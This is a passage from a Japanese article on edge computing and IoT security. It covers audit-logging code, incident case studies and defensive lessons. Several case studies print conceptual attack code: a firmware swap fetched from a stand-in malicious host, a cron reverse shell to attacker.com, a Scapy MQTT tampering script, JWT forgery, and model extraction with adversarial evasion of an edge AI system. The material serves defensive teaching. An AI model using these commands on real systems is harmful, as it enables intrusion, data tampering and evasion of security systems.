logAuthentication(deviceId, success, method, metadata = {}) {
auditLogger.info({
eventType: 'authentication',
deviceId,
success,
method,
...metadata,
timestamp: new Date().toISOString()
});
}
/**
* 管理操作を記録
* @param {string} adminId 操作を実行した管理者ID
* @param {string} operation 実行された操作
* @param {string} targetId 操作対象
* @param {object} metadata 追加情報
*/
logAdminOperation(adminId, operation, targetId, metadata = {}) {
auditLogger.info({
eventType: 'admin_operation',
adminId,
operation,
targetId,
...metadata,
timestamp: new Date().toISOString()
});
}
}
// 使用例
const auditor = new AccessAuditor();
// アクセス制御ミドルウェア
function accessControlMiddleware(req, res, next) {
const deviceId = req.headers['x-device-id'];
const resourceId = req.params.resourceId;
const action = req.method; // GET, POST, PUT, DELETE
// アクセス制御ロジック
const hasPermission = checkPermission(deviceId, resourceId, action);
// 監査ログを記録
auditor.logAccess(deviceId, resourceId, action, hasPermission, {
ipAddress: req.ip,
userAgent: req.headers['user-agent']
});
if (hasPermission) {
next(); // 処理を継続
} else {
res.status(403).json({ error: 'アクセス権限がありません' });
}
}監査とモニタリングのベストプラクティス:
- 詳細なログ記録: すべてのアクセス試行と認証イベントのログを記録
- 中央集約型ロギング: ログを集約して保管し、分析可能にする
- アラート設定: 異常なアクセスパターンを検出した際の通知システム
- 改ざん防止ログ: ログの改ざんを防止または検出するメカニズム
- 保持ポリシー: 監査ログの保持期間と安全な消去ポリシー
「信頼は検証できる場合にのみ、真の信頼となる」という言葉がありますが、適切な認証・認可メカニズムと監査システムは、エッジコンピューティング環境に信頼性をもたらす重要な要素です。次のセクションでは、これらのセキュリティベストプラクティスが実際の場面でどのように役立つか、いくつかのケーススタディを紹介します。
実際のケーススタディ:セキュリティインシデントとその教訓
エッジコンピューティングの世界でも、セキュリティインシデントは残念ながら発生します。以下では、実際に起きたセキュリティインシデントの事例を紹介し、その教訓から学ぶべきポイントを解説します。
1. スマートホームハブのセキュリティ侵害
事例:2019年、あるスマートホームプラットフォームで、ハブデバイスを通じてユーザーの家庭内ネットワークに侵入されるセキュリティインシデントが発生しました。
詳細:
- ハブデバイスのファームウェアに重大な脆弱性が存在
- デフォルトのSSH認証情報が変更されていなかった
- ファームウェア更新プロセスが署名検証を行っていなかった
攻撃者は、これらの脆弱性を利用して以下の攻撃を行いました:
# 攻撃者が利用した侵入手法(概念的な例)
# 1. デフォルト認証情報を使ってSSHアクセス
ssh [email protected] -p 22022 # 非標準ポートでSSHが稼働
# 2. 権限昇格の脆弱性を悪用
sudo -l # 実行可能なコマンドを確認
sudo /opt/hub/bin/system_check --debug # デバッグモードに特権昇格の脆弱性
# 3. 不正なファームウェアの注入
wget https://malicious-server.com/fake-firmware.bin
mv fake-firmware.bin /opt/hub/firmware/update.bin
/opt/hub/bin/apply_update --force # 署名検証をバイパス
# 4. 持続的アクセスのためのバックドアの設置
crontab -e
# 以下を追加して永続的なリモートアクセスを確立
@reboot /bin/bash -c '/bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1'教訓:
- デフォルト認証情報の変更を強制する: 初回セットアップ時にデフォルトパスワードの変更を必須とする
- 署名検証の徹底: すべてのファームウェア更新に対して暗号的署名検証を実装する
- 最小特権の原則: デバイス上のプロセスは必要最低限の権限のみで実行する
- 定期的なセキュリティ監査: 脆弱性を早期に発見するための継続的なセキュリティテスト
2. 産業用センサーネットワークへの中間者攻撃
事例:2021年、ある製造工場のセンサーネットワークで中間者攻撃が発生し、誤ったデータが送信されることで生産ラインに混乱が生じました。
詳細:
- センサーとゲートウェイ間の通信が暗号化されていなかった
- デバイス間の相互認証が行われていなかった
- ネットワークセグメンテーションが適切に実装されていなかった
攻撃者はARPスプーフィングを使用してネットワーク上のデバイス間の通信を傍受し、改ざんしました:
# 攻撃者が使用した通信傍受と改ざんのコンセプト(Python/Scapy)
from scapy.all import *
def packet_callback(packet):
# MQTT通信パケットを検出
if packet.haslayer(TCP) and packet.haslayer(Raw):
if packet[TCP].dport == 1883 or packet[TCP].sport == 1883: # MQTT標準ポート
payload = packet[Raw].load.decode('utf-8', errors='ignore')
# センサーデータを含むパケットを検出
if "temperature" in payload:
# 不正なデータに改ざん(温度を高く偽装)
modified_payload = payload.replace('"temperature": 22.5', '"temperature": 85.0')
# パケットを再構築して送信
modified_packet = packet.copy()
modified_packet[Raw].load = modified_payload.encode('utf-8')
# チェックサムを再計算
del modified_packet[IP].chksum
del modified_packet[TCP].chksum
# 偽のパケットを送信
send(modified_packet, verbose=0)
print("[+] センサーデータを改ざんしました!")
# 元のパケットのドロップを試みる
return "drop"
return packet
# ARPスプーフィングを実行(詳細は省略)
# ...
# パケットのキャプチャと改ざん
sniff(prn=packet_callback, store=0)教訓:
- エンドツーエンドの暗号化: すべてのデバイス間通信を暗号化する
- 相互認証の実装: デバイスとゲートウェイは互いに認証を行う
- ネットワークセグメンテーション: 制御ネットワークと一般ネットワークを分離する
- 異常検知システムの導入: 通常と異なるデータパターンを検出する仕組みを実装する
3. スマートカメラのグローバルセキュリティインシデント
事例:2020年初頭、ある大手メーカーのクラウド接続型スマートカメラで、大規模なプライバシー侵害が発生しました。数千台のカメラが不正アクセスされ、プライベートな映像が漏洩しました。
詳細:
- クラウドインフラストラクチャの認証システムに設計上の欠陥があった
- アクセストークンの有効期限が長すぎた(180日間)
- 暗号化キーの管理が不適切だった
このインシデントでは、攻撃者がAPIトークンを横取りして不正アクセスを行いました:
// 攻撃者が利用したトークン改ざんの概念例(Node.js)
// 1. 既存のAPIトークンを解析
const jwt = require('jsonwebtoken');
const stolenToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...'; // 盗まれたトークン
// 2. トークンのペイロードを解析(署名検証なし)
const decodedToken = jwt.decode(stolenToken);
console.log('解析されたトークン:', decodedToken);
// 3. 権限昇格したトークンの作成
const elevatedClaims = {
...decodedToken,
role: 'admin', // 権限を管理者に変更
user_id: 'global_admin', // ユーザーIDの変更
exp: Math.floor(Date.now() / 1000) + (365 * 24 * 60 * 60) // 有効期限を1年に延長
};
// 4. 新しいトークンの署名(サーバー側の検証の欠陥を悪用)
// 本来は正しい秘密鍵が必要だが、検証の欠陥により任意の署名で通過
const forgedToken = jwt.sign(elevatedClaims, 'guessed_or_leaked_secret');
console.log('偽造トークン:', forgedToken);
// 5. このトークンを使用して任意のカメラにアクセス
// GET /api/cameras/access?token=forgedToken教訓:
- 適切なトークン有効期限: アクセストークンは短い有効期限を設定する
- 署名検証の厳格化: トークンの検証は厳密に行い、署名アルゴリズムの検証も含める
- キー管理の強化: 暗号鍵は安全に保管し、定期的にローテーションする
- 多層防御: 単一の認証システムに依存せず、複数の防御層を設ける
4. エッジAIプラットフォームでのモデル抽出攻撃
事例:2022年、エッジAIを活用したセキュリティシステムで、攻撃者が機械学習モデルを抽出することに成功し、その後システムを欺くアドバーサリアル攻撃を仕掛けました。
詳細:
- エッジデバイスのAIモデルが適切に保護されていなかった
- 推論結果から元のモデルの情報を抽出される脆弱性があった
- 物理的な改ざん対策が不十分だった
攻撃者はモデル抽出攻撃の後、アドバーサリアル例を生成してシステムを欺きました:
# モデル抽出とアドバーサリアル攻撃の概念例
import numpy as np
import requests
# 1. モデル抽出のためのクエリ
def query_target_model(image):
"""エッジデバイスのAPIをクエリして予測結果を取得"""
response = requests.post(
"http://edge-device.local/predict",
files={"image": image}
)
return response.json()["predictions"]
# 2. 代理モデルの訓練(概念的な例)
def train_surrogate_model(num_queries=1000):
"""代理モデルを訓練するための関数"""
X_train = []
y_train = []
# 多数のランダム入力を生成してターゲットモデルをクエリ
for i in range(num_queries):
# ランダムな入力を生成
random_image = np.random.rand(224, 224, 3) * 255
random_image = random_image.astype(np.uint8)
# ターゲットモデルをクエリ
predictions = query_target_model(random_image)
# 訓練データを収集
X_train.append(random_image)
y_train.append(predictions)
# 代理モデルの訓練(実装の詳細は省略)
surrogate_model = train_model(X_train, y_train)
return surrogate_model
# 3. アドバーサリアル例の生成
def generate_adversarial_example(image, surrogate_model, target_class):
"""代理モデルを使用してアドバーサリアル例を生成"""
# 勾配計算を使用してアドバーサリアル例を生成(詳細は省略)
# ...
return adversarial_image
# 4. エッジデバイスに対する攻撃
def attack_edge_device():
# 代理モデルを訓練
surrogate = train_surrogate_model()
# 通常は「人物」と検出される画像
original_image = load_image("person.jpg")
# 「人物なし」と誤分類させるアドバーサリアル例を生成
adversarial_image = generate_adversarial_example(
original_image, surrogate, target_class="no_person"
)
# エッジデバイスをアドバーサリアル例で攻撃
result = query_target_model(adversarial_image)
print("攻撃結果:", result)
# 画像をわずかに変更してセキュリティシステムを回避
save_image(adversarial_image, "adversarial.jpg")教訓:
- 安全なモデルデプロイ: エッジデバイス上のAIモデルは暗号化して保護する
- モデル難読化: AIモデルに難読化技術を適用して抽出攻撃を困難にする
- 信頼実行環境の活用: TEE(Trusted Execution Environment)でAI推論を保護する
- アドバーサリアル防御: モデルをアドバーサリアル例に堅牢にするための訓練手法を適用する
セキュリティインシデントからの主な教訓
これらのケーススタディから、エッジコンピューティングのセキュリティに関する重要な教訓を学ぶことができます:
- 多層防御の原則: 単一の保護策に依存せず、複数の防御層を構築する
- 継続的な監視と更新: セキュリティは一度限りのタスクではなく、継続的なプロセス
- ユーザー教育の重要性: セキュリティはテクノロジーだけでなく人的要因も考慮する
- プライバシー・バイ・デザイン: システム設計の最初の段階からセキュリティとプライバシーを考慮する
- インシデント対応計画: セキュリティ侵害が発生した場合の計画を事前に策定しておく
「歴史から学ばない者は歴史を繰り返す運命にある」という言葉があるように、過去のセキュリティインシデントを学び、その教訓を活かすことが、安全なエッジコンピューティング環境を構築するための重要なステップです。
まとめ
本記事では、エッジコンピューティングのセキュリティについて、その基本概念からベストプラクティス、実際のケーススタディまで包括的に解説しました。
エッジコンピューティングは、IoTデバイスによるデータ処理の効率化と高速化に革命をもたらしていますが、同時に新たなセキュリティ課題も生み出しています。物理的なアクセス、リソース制約、不十分な認証、ネットワークの脆弱性、ソフトウェアの脆弱性など、多くの課題に対処するためには、体系的なアプローチが必要です。
効果的なセキュリティ対策として、以下のポイントを重点的に実施することをお勧めします:
- 基本的なセキュリティ対策: デバイスの安全な初期設定、ハードウェアセキュリティの強化、ファームウェア管理、ネットワークセグメンテーション、継続的なモニタリング
- 暗号化とセキュア通信: 軽量暗号化プロトコル、セキュアブート、相互TLS認証、セキュアな通信プロトコル、セキュリティゲートウェイ
- 認証・認可ベストプラクティス: 堅牢なデバイス認証、OAuth 2.0の活用、きめ細かな認可制御、安全なプロビジョニング、監査とモニタリング
エッジコンピューティングのセキュリティは、技術的な対策だけでなく、組織のセキュリティ文化や意識の向上も含めた総合的なアプローチが必要です。セキュリティインシデントからの教訓を活かし、継続的に改善を行うことで、安全なエッジコンピューティング環境を実現できるでしょう。
「セキュリティはチェーンの最も弱い環の強さである」という格言を忘れずに、エッジからクラウドまでのエンドツーエンドのセキュリティを確保することが、IoTデバイスとエッジコンピューティングの真の価値を安全に引き出す鍵となります。
![Webアプリケーションアクセシビリティ──今日から始める現場からの改善 [ 伊原 力也 ]](https://thumbnail.image.rakuten.co.jp/@0_mall/book/cabinet/3665/9784297133665_1_4.jpg)
